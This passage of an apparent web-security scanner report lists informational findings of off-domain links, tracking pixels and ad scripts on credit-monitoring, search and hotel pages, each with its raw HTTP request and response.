Set-Cookie: MachineName=IRC-P2WEB-44; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: OriginalReferrer=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=default; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 5:54:36 PM; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=1062; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NumTrialDaysLeft=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: UID=7135d595e6d7454c98dae899d7749053; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: BIGipServerfreecreditreport-web-pool=177229322.37663.0000; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 00:54:36 GMT
ETag: "pv8c989b447d4b448d39e7b7d5f33f7c53"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C76613.A70584.RA0.G11456.U2FCB3501].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 14619

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           Credit Report and Credit History | Free Credit Report
       </title>
       <meta name="GENERATOR" Content="Micr
...[SNIP]...
<li id="mcafee"><a href="https://www.scanalert.com/RatingVerify?ref=www.freecreditreport.com" target="_blank"><img width="94" height="54" src="//images.scanalert.com/meter/www.freecreditreport.com/13.gif" border="0" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime."
oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;">
</a></li>
           <li><script src=https://seal.verisign.com/getseal?host_name=www.freecreditreport.com&size=M&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1072108379/?label=J2jSCPzy3gEQ26ac_wM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...
<noscript><a title="Survey Software" target="_blank" href="https://www.qualtrics.com/survey-software/">Survey Software</a><br/><a target="_blank" title="Enterprise Feedback Management" href="https://www.qualtrics.com/enterprise-feedback-management/">Enterprise Feedback Management</a>
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=2700844;dcnet=3973;boom=47663;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
</noscript>
...[SNIP]...

23.522. http://www.freecreditscore.com/dni/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freecreditscore.com
Path:   /dni/default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dni/default.aspx?PageTypeID=HomePage21&SiteVersionID=932&SiteID=100323&sc=671212&bcd= HTTP/1.1
Host: www.freecreditscore.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MachineName=IRC-P2WEB-07; OriginalReferrer=; NavigationPath=default; LastVisitDate=4/24/2011 12:44:36 PM; NavFlowID=; NumTrialDaysLeft=; UID=dfa29d439e60422e86d8462241524cd1; ASP.NET_SessionId=z5w0c1552jmahb45v4wnxt3b; BIGipServerfreecreditscore-web-pool=174804490.19999.0000

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: NavigationPath=default+s_code.axd+default; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: LastVisitDate=4/24/2011 12:53:22 PM; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 24 Apr 2011 19:53:22 GMT
ETag: "pv59c36d169d599af69881e879374da22d"
Cache-Control: private
X-PvInfo: [S10203.C70872.A70594.RA0.G11457.U7D2DD613].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 13546


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<base href="http://www.freecreditscore.com/dni/" />
<title>Cre
...[SNIP]...
<li class="code0"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.freecreditscore.com&amp;size=M&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...
<!-- START SCANALERT CODE -->
<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.freecreditscore.com"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.freecreditscore.com/13.gif" alt="McAfee SECURE sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<!-- Start of ECD-Pixel Tag -->
<script type="text/javascript" src="http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzAvY2F0LzMyNTc5Mjk">
</script>
...[SNIP]...
<!-- Advertiser 'Yahoo!', Include user in segment 'SIP/FCS 932 LP/do not use' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=973085&t=2" width="1" height="1" />
<!-- End of segment tag -->
...[SNIP]...
<!-- Start of ECD-Pixel Tag -->
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=fcrlandingpage_cs=1&betq=12446=430575" width = "1" height = "1" border = "0">
<!-- End of ECD-Pixel Tag -->
...[SNIP]...
<!-- Start of ECD-Pixel Tag -->
<img height="1" width="1" src="http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDUwOTQ">
<!-- End of ECD-Pixel Tag -->
...[SNIP]...
<noscript><a title="Survey Software" target="_blank" href="https://www.qualtrics.com/survey-software/">Survey Software</a><br/><a target="_blank" title="Enterprise Feedback Management" href="https://www.qualtrics.com/enterprise-feedback-management/">Enterprise Feedback Management</a>
...[SNIP]...

23.523. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=identity+monitoring HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=I-kkntLExM1TTzSWRyCwKeEK8o5z0wImIqRngsTZ1f7pPvcoVlw_RvPfaxCnExmyYdaAF09G-fMazzXzLodN-Utpj4hqQcsHLazgtjUOhze8vEcdwKcppf0Keaf3xqTz

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:45:32 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/rU20-FBA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 86972

<!doctype html> <head> <title>identity monitoring - Google Search</title> <script>window.google={kEI:"3H20TamEINLAtgfSh_TpDg",kEXPI:"17259,24472,25907,27147,28514,28766,28887,29050,29402,29477,29
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=identity+monitoring&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.identitymonitor.citi.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CDsQFjAA')"><em>
...[SNIP]...
<div class=osl><a href="http://www.identitymonitor.citi.com/contactus.aspx" onmousedown="return clk(this.href,'','','','1','','0CEIQ0gIoADAA')">Contact Us</a> - <a href="http://www.identitymonitor.citi.com/benefits.aspx" onmousedown="return clk(this.href,'','','','1','','0CEMQ0gIoATAA')">Benefits</a> - <a href="http://www.identitymonitor.citi.com/faqs.aspx" onmousedown="return clk(this.href,'','','','1','','0CEQQ0gIoAjAA')">FAQs</a> - <a href="http://www.identitymonitor.citi.com/about.aspx" onmousedown="return clk(this.href,'','','','1','','0CEUQ0gIoAzAA')">About Identity Theft</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:qsiDBxA0hQgJ:www.identitymonitor.citi.com/+identity+monitoring&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CEAQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.fightidentitytheft.com/credit-monitoring.html" class=l onmousedown="return clk(this.href,'','','','2','','0CEcQFjAB')">Credit <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:mKtVGOItW08J:www.fightidentitytheft.com/credit-monitoring.html+identity+monitoring&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CEwQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.identityguard.com/credit-monitoring.aspx" class=l onmousedown="return clk(this.href,'','','','3','','0CE4QFjAC')">Credit <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:enxhpmwiNsoJ:www.identityguard.com/credit-monitoring.aspx+identity+monitoring&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CFUQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html" class=l onmousedown="return clk(this.href,'','','','4','','0CFcQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:S-E6XnAEb9UJ:www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html+identity+monitoring&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CFwQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.arcsight.com/products/products-identity/" class=l onmousedown="return clk(this.href,'','','','5','','0CF4QFjAE')">ArcSight IdentityView - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6SRfBuN5FDMJ:www.arcsight.com/products/products-identity/+identity+monitoring&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CGMQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.experiandirect.com/" class=l onmousedown="return clk(this.href,'','','','6','','0CGUQFjAF')">Protect yourself from <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:QkNvfkjo0m0J:www.experiandirect.com/+identity+monitoring&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CGoQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.privacyguard.com/" class=l onmousedown="return clk(this.href,'','','','7','','0CGwQFjAG')">Credit reporting, credit <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ETaosHucw1kJ:www.privacyguard.com/+identity+monitoring&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CHEQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.foxbusiness.com/personal-finance/2011/02/23/credit-monitoring-services-pros-cons-pick/" class=l onmousedown="return clk(this.href,'','','','8','','0CHMQFjAH')">Credit <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nKale0HKngIJ:www.foxbusiness.com/personal-finance/2011/02/23/credit-monitoring-services-pros-cons-pick/+identity+monitoring&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CHgQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://ivebeenmugged.typepad.com/my_weblog/2008/07/citi-credit-monitoring-service-and-citi-identity-monitor-product-review.html" class=l onmousedown="return clk(this.href,'','','','9','','0CHkQFjAI')">I&#39;ve Been Mugged: Citi Credit <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:g1l1GMxxLfsJ:ivebeenmugged.typepad.com/my_weblog/2008/07/citi-credit-monitoring-service-and-citi-identity-monitor-product-review.html+identity+monitoring&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CH4QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.calif.aaa.com/en-ca/become-member/Pages/safeguard-your-identity.aspx" class=l onmousedown="return clk(this.href,'','','','10','','0CIABEBYwCQ')">AAA - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:afuXgI61w6QJ:www.calif.aaa.com/en-ca/become-member/Pages/safeguard-your-identity.aspx+identity+monitoring&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CIUBECAwCQ')">Cached</a>
...[SNIP]...

23.524. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=reputation+monitoring HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: rU20-FBA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=I-kkntLExM1TTzSWRyCwKeEK8o5z0wImIqRngsTZ1f7pPvcoVlw_RvPfaxCnExmyYdaAF09G-fMazzXzLodN-Utpj4hqQcsHLazgtjUOhze8vEcdwKcppf0Keaf3xqTz

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:42 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 38449

f94-wCe9....S....o...(..B..........7..e<!doctype html> <head> <title>reputation monitoring - Google Search</title> <script>window.google={kEI:"KsG0Td2XE4eTtwfYmo3qDg",kEXPI:"17259,24472,25907,271
...[SNIP]...
</a> - <a href="http://track.trackur.com/register/signup.php./^.^2','','0CEIQ0gIoATAB')">Sign-up!</a> - <a href="http://www.trackur.com/social-media-monitoring./^.b2','','0CEMQ0gIoAjAB')">Features</a> - <a href="http://www.trackur.com/free-brand-monitoring-tools./^.\2','','0CEQQ0gIoAzAB')">Free Brand Monitoring Tools</a>
...[SNIP]...

23.525. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=1&ved=0CDIQFjAA&url=http%3A%2F%2Fwww.reputation-watch.com%2F&ei=UsG0TaTDE8actwec4P3pDg&usg=AFQjCNGGjuyYj1Xg5OIyghflUiEC_t14xQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=I-kkntLExM1TTzSWRyCwKeEK8o5z0wImIqRngsTZ1f7pPvcoVlw_RvPfaxCnExmyYdaAF09G-fMazzXzLodN-Utpj4hqQcsHLazgtjUOhze8vEcdwKcppf0Keaf3xqTz

Response

HTTP/1.1 302 Found
Location: http://www.reputation-watch.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 00:33:31 GMT
Server: gws
Content-Length: 229
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.reputation-watch.com/">here</A>
...[SNIP]...

23.526. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=2&ved=0CDUQFjAB&url=http%3A%2F%2Fwww2.hillandknowlton.com%2Fcrw%2F&ei=UsG0TaTDE8actwec4P3pDg&usg=AFQjCNGQv8TYPYgADBAlkZEFXaPHegHnMQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=I-kkntLExM1TTzSWRyCwKeEK8o5z0wImIqRngsTZ1f7pPvcoVlw_RvPfaxCnExmyYdaAF09G-fMazzXzLodN-Utpj4hqQcsHLazgtjUOhze8vEcdwKcppf0Keaf3xqTz

Response

HTTP/1.1 302 Found
Location: http://www2.hillandknowlton.com/crw/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 00:33:40 GMT
Server: gws
Content-Length: 233
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www2.hillandknowlton.com/crw/">here</A>
...[SNIP]...

23.527. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=3&ved=0CFkQFjAC&url=http%3A%2F%2Fwww.truecredit.com%2F&ei=fsG0Te6ZGJKTtwec9OjpDg&usg=AFQjCNHbgRDaTAPBWvYI6RPd2nPrvSqoZw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=I-kkntLExM1TTzSWRyCwKeEK8o5z0wImIqRngsTZ1f7pPvcoVlw_RvPfaxCnExmyYdaAF09G-fMazzXzLodN-Utpj4hqQcsHLazgtjUOhze8vEcdwKcppf0Keaf3xqTz

Response

HTTP/1.1 302 Found
Location: http://www.truecredit.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 00:34:17 GMT
Server: gws
Content-Length: 223
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.truecredit.com/">here</A>
...[SNIP]...

23.528. http://www.hellonetwork.com/ypsearch.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hellonetwork.com
Path:   /ypsearch.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ypsearch.cfm?kw=credit%20monitoring&KID=29264 HTTP/1.1
Host: www.hellonetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: IPCITYNAME=Dallas;expires=Tue, 16-Apr-2041 19:56:39 GMT;path=/
Set-Cookie: IPCITYSTATE=TX;expires=Tue, 16-Apr-2041 19:56:39 GMT;path=/
Set-Cookie: IPCITYZIP=75207;expires=Tue, 16-Apr-2041 19:56:39 GMT;path=/
Set-Cookie: SEARCHKEYWORD=credit%20monitoring;path=/
Set-Cookie: AFSCHANNEL=3788747813;path=/
Date: Sun, 24 Apr 2011 19:56:39 GMT
Content-Length: 50298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com
...[SNIP]...
</title>


       <script src="http://www.google.com/jsapi"> </script>
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAxlNjcILiMUNra09cJ_A5shTJTasaZLGu-S0MxpFJaRF7NywsZRSBRU3tj6CuxjTTjBB8JFKkUFVXXA" type="text/javascript"></script>


               <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
       </script>
...[SNIP]...
<div class="subPageTitle"><a href="http://www.hellometro.com/advertise/">Advertise</a>
...[SNIP]...
<div class="subPageTitle"><a href="http://www.hellometro.com/contact.cfm">Contact US</a>
...[SNIP]...
<div class="subPageTitle"><a href="http://www.hellometro.com/about.cfm">About US</a>
...[SNIP]...
<div class="subPageTitle"><a href="http://www.hellometro.com/Privacy.cfm">Privacy Policy</a>
...[SNIP]...
<!-- using cf_buildmap -->


<script type="text/javascript" src="http://hellometro.us.intellitxt.com/intellitxt/front.asp?ipid=27851"></script>
...[SNIP]...

23.529. http://www.hotelclub.com/common/adRevresda.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelclub.com
Path:   /common/adRevresda.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /common/adRevresda.asp?channel=home&Section=main&adsize=160x600&pos=external HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HTC=AppVer=1%2E0; anon=1129876971252011042422094; ASPSESSIONIDCCQRQCTQ=FDCOCPBANKNGOIFKLDNNOFAM; NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273245525d5f4f58455e445a4a422974

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Cteonnt-Length: 252
Content-Type: text/html
Cache-Control: private
Date: Sun, 24 Apr 2011 12:09:46 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 252

<script language="javascript" src="http://www.revresda.com/js.ng/CookieName=PRO2&site=HCL&platform=classic&secure=false&m=0&v=-803181687&language=en&currency=USD&subdomain=HCAU&channel=home&Section=main&adsize=160x600&pos=external&country=US"></script>

23.530. http://www.hotelclub.com/common/adRevresda.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelclub.com
Path:   /common/adRevresda.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HTC=AppVer=1%2E0; anon=1129876971252011042422094; ASPSESSIONIDCCQRQCTQ=FDCOCPBANKNGOIFKLDNNOFAM; NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273245525d5f4f58455e445a4a422974

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Cteonnt-Length: 249
Content-Type: text/html
Cache-Control: private
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 12:09:46 GMT
Connection: close
Content-Length: 249

<script language="javascript" src="http://www.revresda.com/js.ng/CookieName=PRO2&site=HCL&platform=classic&secure=false&m=0&v=-803181687&language=en&currency=USD&subdomain=HCAU&channel=home&Section=main&adsize=728x90&pos=bottom&country=US"></script>

23.531. http://www.identityguard.com/gscc.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identityguard.com
Path:   /gscc.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /gscc.aspx?mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: www.identityguard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: URLParams=mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; cmTPSet=Y; CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.1.10.1303614598; 90226925_clogin=l=1303614597&v=1&e=1303615498489

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20039
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
